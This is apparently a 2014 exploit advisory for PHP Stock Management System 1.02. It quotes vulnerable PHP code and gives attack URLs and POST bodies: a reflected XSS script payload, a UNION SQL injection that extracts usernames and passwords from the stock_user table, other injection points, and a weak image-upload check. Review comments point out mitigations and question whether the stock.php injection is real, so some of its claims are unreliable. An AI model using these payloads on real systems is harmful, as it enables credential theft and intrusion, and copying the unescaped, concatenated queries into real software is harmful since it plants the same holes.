
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilities
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSS install.php
code :
// Reflected XSS: a request-controlled value is written into the HTML response as-is.
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
// Mitigation: escape for the HTML context before output, e.g.
// htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8').
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
// $q is taken straight from the query string; it is lowercased but not otherwise validated.
$q = strtolower($_GET["q"]);
if (!$q) return;
// NOTE(review): the query below is a constant string and $q is only used in strpos()
// on the fetched rows, so the SQL injection this section claims is not evident from
// these lines alone — verify against the full stock.php before relying on it.
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
// Output is unescaped; if this response is rendered as HTML, stored names need escaping too.
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
// SQL injection: $_POST['searchtxt'] is concatenated into the WHERE clause four times
// with no escaping or binding. Mitigation: build the statement with placeholders and
// bind the '%term%' value once per LIKE through PDO/mysqli, never by string concatenation.
// NOTE(review): customer_contact1 is compared twice; the second is presumably meant to be
// a different column.
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
// $limit is only assigned when the parameter is numeric; the branch then resets
// $_GET['limit'] rather than $limit, so a missing or non-numeric limit leaves $limit
// undefined and the LIMIT clause below malformed.
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
// $page is read with no validation or integer cast before being used in arithmetic.
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
// $start and $limit are interpolated directly into SQL; both should be cast to int first.
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
// SQL injection: $_POST['searchtxt'] is concatenated into four LIKE clauses unescaped.
// Mitigation: a prepared statement with bound parameters; the mysql_* extension used
// below offers no binding and was removed in PHP 7, so PDO or mysqli is required.
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD : logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
// The extension is the last dot-separated segment of the client-supplied filename.
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
// $_FILES["file"]["type"] is the MIME type reported by the client, not derived from the
// uploaded bytes, so it is not a trustworthy check. Only gif/png types pass here even
// though the extension list also allows jpeg/jpg. Server-side validation should inspect
// the content (e.g. getimagesize()/finfo) and store under a server-generated name.
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
// The original client filename is retained; the excerpt ends before the file is
// written, so the destination path is not visible in these lines.
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Greets : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################